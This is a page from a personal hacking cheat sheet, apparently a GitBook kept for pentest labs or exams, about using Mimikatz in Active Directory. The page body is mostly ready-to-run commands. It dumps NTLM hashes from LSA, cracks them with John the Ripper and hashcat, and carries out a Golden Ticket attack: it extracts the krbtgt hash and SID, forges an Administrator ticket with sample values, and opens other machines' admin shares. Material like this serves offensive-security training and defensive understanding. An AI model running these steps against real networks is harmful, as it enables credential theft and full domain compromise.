Cheat Sheet Hacking
  • 🌐Generic Ideas
    • File Transfer
    • Reverse Shell
    • Cracking Tricks
    • Tunneling and Port Forwarding
    • Reversing
    • OSINT
    • Phishing
  • 🐕‍🦺Port enumeration
    • Reconnaissance
    • 53 - DNS
    • 80,443 - Web
      • Identify php.ini file used
      • Exploitation
        • File Upload
        • XXS
    • 445 - SMB
    • 389, 636, 3268 - LDAP(S)
  • LINUX THINGS
    • Enumeration
    • Privilege Escalation
      • Writable $PATH
  • WINDOWS THINGS
    • Enumeration
    • Useful Commands
    • Active Directory Methodology
      • Commands to create AD environment
      • Attacks
        • Kerberos
          • User enumeration
          • ASREP-Roast
          • Kerberoasting
          • ASREP-Roast VS Kerberoasting
          • Golden Ticket
          • Resource Based Constrained Delegation
        • Secrets dump
        • Pass The Hash
        • Dump NTDS
        • Tickets
          • TGT
        • NTML Password Spray
        • LDAP Authentication
          • LDAP Pass-back
          • Rogue LDAP Server
        • SMB Relay (LLNMR, NTB-NS & WPAD)
        • NTLM Relay
        • Tools to exploit AD things
        • SCF Files
      • Kerberos
      • SAM & LSA secrets
      • Enumeration
        • BloodHound
        • PowerView
          • CheatSheet of Commands
        • Set DNS & DOMAIN
      • Resources
      • RunAs
      • Post Explotation
        • Persistence
        • Mimikatz
      • Common used tools
  • 🕳️Pivoting
    • Port Forwarding
    • Socks Forwarding
    • Routing
    • Web Fuzzing
    • Transfer files
    • Metasploit
      • Single Pivot
      • Double Pivot
    • Burp Suite
  • 🎛️Hardware
    • Physical attacks
  • 🌕Buffer Overflow
    • Introduction
    • Stack-Based
      • Introduction
        • Spiking
        • Fuzzing
        • Find Offset
        • Overwrite EIP
        • Find module
        • Find Badchars
        • Shellcode
  • 🐳Docker
    • Commands
    • Practical examples
  • 💡Useful things
    • Burp Suite
      • Proxy Activation
    • Linux Commands
    • Recreate multipart/form-data request
      • Python
      • HTML & netcat
    • TTY
    • Templates for reports (exams)
    • Tmux
    • Other cheat sheets
Powered by GitBook
On this page
  • Run mimikatz
  • Run mimikatz as Administrator
  • Extract NTLM hashes
  • Crack NTLM hashes
  • Identify hash type
  • John the Ripper
  • Hashcat
  • Golden ticket attack
  • Extract info about krbtgt (Kerberos Ticket Granting Ticket account)
  • Generating ticket
  • Accessing to machines
  1. WINDOWS THINGS
  2. Active Directory Methodology
  3. Post Explotation

Mimikatz

PreviousPersistenceNextCommon used tools

Last updated 6 months ago

Mimikatz is a very popular and powerful post-exploitation tool mainly used for dumping user credentials inside of a active directory network.

The idea is take that credentials (hashes) and try to crack them.

Run mimikatz

.\mimikatz.exe

Run mimikatz as Administrator

Inside mimikatz interaction, we run:

privilege::debug

Extract NTLM hashes

lsadump::lsa /patch

Crack NTLM hashes

➧ cat mimikatz-ntlm.hashes 
Administrator:2777b7fec870e04dda00cd7260f7bee6
krbtgt:5508500012cc005cf7082a9a89ebdfdf
[...]

Identify hash type

➧ haiti '2777b7fec870e04dda00cd7260f7bee6'
NTLM [HC: 1000] [JtR: nt]

John the Ripper

john --wordlist=/usr/share/wordlists/rockyou.txt --format=NT mimikatz-ntlm.hashes

Hashcat

hashcat -a 0 -m 1000 mimikatz-ntlm.hashes /usr/share/wordlists/rockyou.txt --username --show -o cracked-mimikatz-ntlm.hashes

  • --username: To specify to hashcat that our hash file contains usernames or emails.

  • --show: To save the output like USER:HASH:PLAIN

Golden ticket attack

Extract info about krbtgt (Kerberos Ticket Granting Ticket account)

We will first dump the hash and sid of the krbtgt user then create a golden ticket and use that golden ticket to open up a new command prompt allowing us to access any machine on the network.

lsadump::lsa /inject /name:krbtgt

This dumps the hash and security identifier of the Kerberos Ticket Granting Ticket account allowing you to create a golden ticket.

Generating ticket

kerberos::golden /user: /domain: /sid: /krbtgt: /id:
kerberos::golden /user:Administrator /domain:CONTROLLER.local /sid:S-1-5-21-849420856-2351964222-986696166 /krbtgt:5508500012cc005cf7082a9a89ebdfdf /id:500

/id:500 =

S-1-5-domain-500

Administrator

Cuenta de usuario para el administrador del sistema. Cada equipo tiene una cuenta de administrador local y cada dominio tiene una cuenta de administrador de dominio. La cuenta de administrador es la primera cuenta creada durante la instalación del sistema operativo. La cuenta no se puede eliminar, deshabilitar ni bloquear, pero se puede cambiar el nombre. De forma predeterminada, la cuenta de administrador es miembro del grupo Administradores y no se puede quitar de ese grupo.

Accessing to machines

To enable complete privileges over all the machines:

misc::cmd

And then we have access:

dir \\Desktop-1\c$
dir \\Machine2\c$
GitHub - gentilkiwi/mimikatz: A little tool to play with Windows securityGitHub
Ataque Golden Ticket y cómo mitigarloTrustDimension | Seguridad en la que puedes Confiar
Golden Ticket Attack Explained - MITRE ATT&CK T1558.001Picus Security
Logo
Identificadores de seguridadMicrosoftLearn
Logo
Logo
Logo